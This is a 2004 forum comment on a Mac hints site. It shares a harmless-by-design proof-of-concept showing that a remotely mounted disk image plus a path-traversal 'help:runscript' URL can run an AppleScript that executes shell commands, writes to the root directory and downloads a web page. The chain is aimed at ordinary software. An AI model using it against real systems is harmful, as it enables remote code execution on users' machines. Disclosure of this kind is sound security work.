Submit Hint Search The Forums LinksStatsPollsHeadlinesRSS
14,000 hints and counting!


Click here to return to the 'Disclaimer: Try this at your own risk.' hint
The following comments are owned by whoever posted them. This site is not responsible for what they say.
Disclaimer: Try this at your own risk.
Authored by: anjoschu on May 20, '04 09:09:20AM
Don't be alarmed, I just wanted to make clear that everyone who tries out my exploit does so at his/her own risk. The exploit is designed to be absolutely non-destructive, but who knows what may happen on different systems.

Don't try this if you already have files called /sometestfile.txt and ~/sometestfile.html containing something important. They will not be overwritten, but data will be appended to them, which hypothetically can render them unusable.

If you would like to take a peek into the applescript with scripteditor before trying the exploit to make sure it won't harm your system, the disk image is situated here:

http://www.schuderer.net/pub/dmgtest.dmg
(MD5 (dmgtest.dmg) = f8aa896d52b746b525063c3f8ce29308)

Here is the code of the contained script testme.scpt:


try
	do shell script "echo In my opinion, working under an Administrator account is an unneccessary risk >> /sometestfile.txt"
	set verdict to "you're working as an Admin. That's very bad. I've been able to create
        the file 'sometestfile.txt' in the root directory of your hard drive. If I were feeling malicious, 
        I could install myself in the StartupItems, delete important system files or do almost anything
        else I wanted.
	
"
on error
	set verdict to "you're not working as an Admin. Thus my little plot to create a file in
       the root directory of your hard drive has failed. That's comforting. A little.
	
"
end try

try
	do shell script "curl http://www.heise.de >> ~/sometestfile.html"
	set curlresult to "I was able to download the entry page of a popular German IT news site
          to 'sometestfile.html' in your Home directory. This is just to demonstrate the power of
          a script like this one."
on error
	set curlresult to "Surprisingly I was unable to download some internet site to 'sometestfile.html'
         in your Home directory. Do you happen to have a third-party firewall installed or
          restricted permissions? A good idea if so."
end try

display dialog "Hello, I am (mostly) harmless.

This is a script from a disk image that has been mounted remotely via the URL
  disk://schuderer.net/pub/dmgtest.dmg.
This script  has been launched via the URL
  help:runscript=../../../Volumes/dmgtest/testme.scpt
  
I've noticed that " & verdict & curlresult buttons {"Ooh, I'm scared!"}

Paranoia galore! :)

[ Reply to This | # ]